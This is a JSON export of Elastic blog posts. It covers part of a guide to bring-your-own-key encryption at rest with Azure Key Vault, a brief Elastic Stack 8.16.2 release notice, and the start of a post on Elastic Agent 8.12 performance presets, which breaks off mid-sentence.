75%"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0b501117e0fe375d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e4. Click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate deployment\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The deployment is now created and encrypted using the specified key.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Verification and troubleshooting","_metadata":{"uid":"cs237a2f5ff5bcea81"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1. In the Elastic Cloud Console, you can check that your hosted deployment is correctly encrypted with the key you specified. To do that, go to the deployment’s \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSecurity \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003epage by selecting \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e from the left navigation menu.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs69d1c6f35d40ddec"}}},{"image":{"image":{"uid":"blt96ffbe0f4ca9f7f9","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:25:06.318Z","updated_at":"2024-08-20T14:25:06.318Z","content_type":"image/png","file_size":"366581","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.229Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt96ffbe0f4ca9f7f9/66c4a742038881cc3d1eef0a/image3.png"},"_metadata":{"uid":"cs714b51d6363c0d4f"},"caption_l10n":"","alt_text_l10n":"byok-demo-deployment","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs31fdeff057a4a9ac"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e2. Select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eManage encryption key\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in the Encryption at rest section.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc92bdb76ec53be79"}}},{"image":{"image":{"uid":"bltef0c7fece5d9f172","_version":1,"title":"image9.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:25:18.501Z","updated_at":"2024-08-20T14:25:18.501Z","content_type":"image/png","file_size":"320514","filename":"image9.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.414Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltef0c7fece5d9f172/66c4a74e13428673bac3d845/image9.png"},"_metadata":{"uid":"csc3ab2d0c0c8cbbd3"},"caption_l10n":"","alt_text_l10n":"manage encryption key","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf4d68c9561414606"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e3. You should see your Azure Key Vault URI and key name listed in the Azure \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKey Vault RSA key identifier \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003efield.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse9b12b7c0f4b1ff9"}}},{"image":{"image":{"uid":"bltefa0823ea5385c01","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T14:21:24.211Z","updated_at":"2024-08-20T14:21:24.211Z","content_type":"image/png","file_size":"135964","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.376Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltefa0823ea5385c01/66c4a664dd1a36004940b7c7/image2.png"},"_metadata":{"uid":"cs94b1a75423322a3a"},"caption_l10n":"","alt_text_l10n":"Key Vault RSA key identifier","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Key rotation and revocation","_metadata":{"uid":"cs22212d91e39eb38f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Hosted deployments encrypted with Azure Key Vault keys benefit from Azure's security policies and features, such as key rotation and revocation. Key rotation helps reduce the risk of data breaches due to compromised keys, while key revocation ensures that access to encrypted data via a compromised key is terminated. This can be done by disabling, deleting the key, or altering the key’s access policy.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAzure Key Vault keys can be rotated manually when necessary. Elastic automatically manages these key rotations, ensuring that your Elastic Cloud deployment remains encrypted and accessible with the most current Azure Key Vault key.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf a key is compromised, you can manually revoke it in Azure Key Vault. This emergency operation, intended for security breaches, locks the deployment’s data directories within 30 minutes and prompts you to delete the deployment. If the revocation is accidental, the key can be restored, allowing the deployment to resume normal operations.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try it out","_metadata":{"uid":"cs60c97797fe9e1334"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eYou now understand the process of using your own key for encrypting an Elastic Deployment on Azure. Initially, an Azure Key Vault key is created and configured with the necessary policy settings for Elastic to manage and rotate the key’s credentials. You can create an Elastic Cloud deployment using this key to encrypt the deployment’s data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGive it a try today! Create an Elastic Cloud deployment with your Azure Key Vault key to enhance the security of your Elastic Cloud deployment. Sign up for a \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efree 14-day trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e to get started. In the last blog of this series, we will walk you through the steps to encrypt your deployment data and snapshots with GCP KMS managed keys.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs19af3fa242a6869c"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs54cc71e490c8118e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5bf70832c03e2e16"}}}],"publish_date":"2024-08-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Implement encryption at rest with Azure Key Vault and Elastic Cloud","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"bltada2311dae66943e","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt405e99573a94e858","ACL":{},"created_at":"2023-11-06T20:37:33.009Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-loss-prevention","label_l10n":"Data Loss Prevention (DLP)","tags":[],"title":"Data Loss Prevention (DLP)","updated_at":"2023-11-06T20:37:33.009Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:40.892Z","user":"blt06083bb707628f5c"}},{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt8617d65f559b9a82","ACL":{},"created_at":"2023-11-06T20:42:46.365Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"microsoft-azure","label_l10n":"Microsoft Azure","tags":[],"title":"Microsoft Azure","updated_at":"2023-11-06T20:42:46.365Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:19.197Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt9c004073d90dac2b","_version":1,"title":"stratus clouds.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-08-20T13:58:46.542Z","updated_at":"2024-08-20T13:58:46.542Z","content_type":"image/jpeg","file_size":"167150","filename":"stratus_clouds.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-08-20T14:39:12.294Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9c004073d90dac2b/66c4a1163f4c1960721cc7ea/stratus_clouds.jpg"},"title":"Encryption at rest in Elastic Cloud: Bring your own key with Azure Key Vault","title_l10n":"Encryption at rest in Elastic Cloud: Bring your own key with Azure Key Vault","updated_at":"2024-12-17T23:36:56.910Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-cloud-azure-key-vault","publish_details":{"time":"2024-12-17T23:37:04.069Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfdc4c28c380ffb80","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["bltbf6fc4da34fe35bb"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-12-16T18:26:39.428Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 8.16.2 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 8.16.2 over the previous versions 8.16.1\n\nThe 8.16.2 release contains a fix for a security vulnerability. Please see our [security advisory for more details](https://discuss.elastic.co/c/announcements/security-announcements/31).\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.16/new.html).","modular_blocks":[],"publish_date":"2024-12-17","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 8.16.2 released","title_l10n":"Elastic Stack 8.16.2 released ","updated_at":"2024-12-17T20:39:28.847Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-16-2-released","publish_details":{"time":"2024-12-17T20:39:34.059Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt3f18cfd58e6d859e","_version":8,"locale":"en-us","ACL":{},"abstract_l10n":"The latest release, version 8.12, marks a significant shift in tuning for Elastic Agent and Beats. Elastic introduces Performance Presets, aiming to simplify the tuning process for users and enhance the default settings for improved performance.","author":["blt7efc3760b8361101","blt61ffae86741bef1a"],"category":["bltb79594af7c5b4199"],"created_at":"2024-01-23T23:23:52.094Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"Big improvements to Elastic Agent performance in 8.12","_metadata":{"uid":"cs34a06bd79f0e8d9e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe latest release, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-12-0\"\u003e\u003cspan style='font-size: 12pt;'\u003eversion 8.12\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, marks a significant shift in tuning for Elastic Agent and Beats. In this update, Elastic® introduces Performance Presets, aiming to simplify the tuning process for users and enhance the default settings for improved performance.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Default setting enhancements","_metadata":{"uid":"cs61430148506f4326"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe default tuning parameters used with Elastic Agent today have been in place since the beginning of Beats and were picked to ensure that data gets into Elasticsearch\u003c/span\u003e\u003cspan style='font-size: 0.6em;'\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e as quickly as possible for analysis. Historically, tweaking performance of Elastic Agent and Beats involved deep knowledge, and benchmarking them for an optimal combination requires even more expertise.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith 8.12, we’ve made tuning Elastic Agent and Beats a thing of the past for the vast majority of customers. We’ve introduced new default settings for Elastic Agent and Beats that:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImprove throughput by up to 50%\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduce memory usage by 10%\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduce concurrent connections to Elasticsearch by up to 80%\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduce Disk I/O in Elasticsearch from Beats/Agent requests by up to 50%\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Introducing Performance Presets","_metadata":{"uid":"cs8d8f14954bdfd0e5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf the new defaults don’t meet your needs, or perhaps you need more throughput or want to scale to a larger deployment of agents, the next step is not tuning parameters in a YAML file; instead, new Performance Presets take the best practices from our trusted customers, field teams, and performance test beds and allow you to pick the preset that best suits your needs, effectively offering a tailored configurations to meet your diverse performance requirements. Let's explore the four presets and the new \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eCustom\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e option and understand which one suits your needs best:\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"1. Balanced ","_metadata":{"uid":"csded08b75ab7bcea2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom 8.12 onward, the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eBalanced\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e preset is the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003edefault\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e preset and optimizes Elastic Agent to achieve a reasonable level of throughput and resource utilization, making it the preferred choice for a wide array of Elastic Agent use cases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor those of you who are familiar with the various settings available within Beats, here are the exact changes happening to the default values in 8.12. These new defaults increase the Events Per Second throughput (EPS) by 25%.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePlease note:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e These settings may change in future versions as we continue to tune these for the best performance.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs2d104c0a286557d0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eConfiguration\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCurrent Default\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBalanced\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003ebulk_max_size\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e50\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1600\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003eworkers\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003equeue.mem.events\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e4096\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3200\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003equeue.mem.flush.min_events\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e2048\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1600\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003equeue.mem.flush.timeout\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e10\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecompression_level\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e1\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003econnection_idle_timeout\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e60\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style=\"font-size: 12pt;\"\u003e3\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs95d7a03daef25644"}}},{"title_text":{"title_text":[{"title_l10n":"2. Optimized for Throughput","_metadata":{"uid":"cs9621ef658fd9a9b3"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eOptimized for Throughput\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e preset focuses on achieving 4x higher data ingestion rates, making it ideal for scenarios where you need Agent to handle high volumes of events. It takes the best parts of the Balanced preset but more freely consumes CPU and memory and multiplexes events across multiple additional connections to Elasticsearch.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"3. Optimized for Scale","_metadata":{"uid":"cs0e870e6c542bb537"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you’re deploying Elastic Agent to tens of thousands of systems, the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eOptimized for Scale\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e preset fine-tunes Elastic Agent for gathering lower volumes of host data like logs or metrics but from tens or hundreds of thousands of devices. It takes the best parts of the Balanced preset, but trades a short delay in data ingestion for a total 30x reduction in open connections to Elasticsearch over the defaults. This makes a big difference if you’re using a reverse proxy or load balancer in front of Elasticsearch. This setting’s EPS performance is fairly similar to that of the Balanced setting.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"4. Optimized for Latency","_metadata":{"uid":"cse67a54b025bc7fa2"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eOptimized for Latency\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e preset reduces the time between data ingestion and processing, making it suitable for low throughput but real-time analytics and applications that demand low latency. This preset closely mirrors the pre-8.12 Elastic Agent default settings and is the perfect fallback for any issues encountered testing the newer presets.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn your Elastic environment, it’s important to note that these presets only impact Agents on version 8.12+. Older versions of Agent will continue to use their existing settings.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"5. Custom","_metadata":{"uid":"cs8720d345fa233062"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhile presets are designed to simplify the tuning process for Elastic Agent, the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eCustom\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e option allows the user to have more granular control over performance. You can still refer to the old guidance provided by Elastic, which is still relevant on Agent as the \u003cspan data-type='inlineCode'\u003equeue.mem.events\u003c/span\u003e are now also configurable. The old guidance, available \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-tune-elastic-beats-performance-a-practical-example-with-batch-size-worker-count-and-more\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, offers practical examples and insights on tuning Elastic Beats performance, including batch size, worker count, and more.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Configuring the performance Presets","_metadata":{"uid":"cs4e58fe3c142c9bc6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou can configure the throughput presets on each Elasticsearch output. As shown below, when editing the Elasticsearch or Remote Elasticsearch output, the user has the option of choosing which preset should apply:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc32486f986fcc750"}}},{"video":{"vidyard_uuid":"SCcB1ZvD1yMLwATCjsFRWn","_metadata":{"uid":"cse0733783bd507ba1"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc7b8646f84c118b0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo provide further guidance, the table in our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/fleet/master/es-output-settings.html#es-output-settings-performance-tuning-settings\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003epublic documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e shows the effects on EPS throughput performance as a function of the performance of the Balanced preset, for various permutations of these tuning parameters, for users who require more granular control. These parameters can be set when the \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eCustom\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e preset is chosen.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn conclusion, Elastic's new Performance Presets provide a convenient way to fine-tune Elastic Agent for different performance requirements. Whether you need a balanced 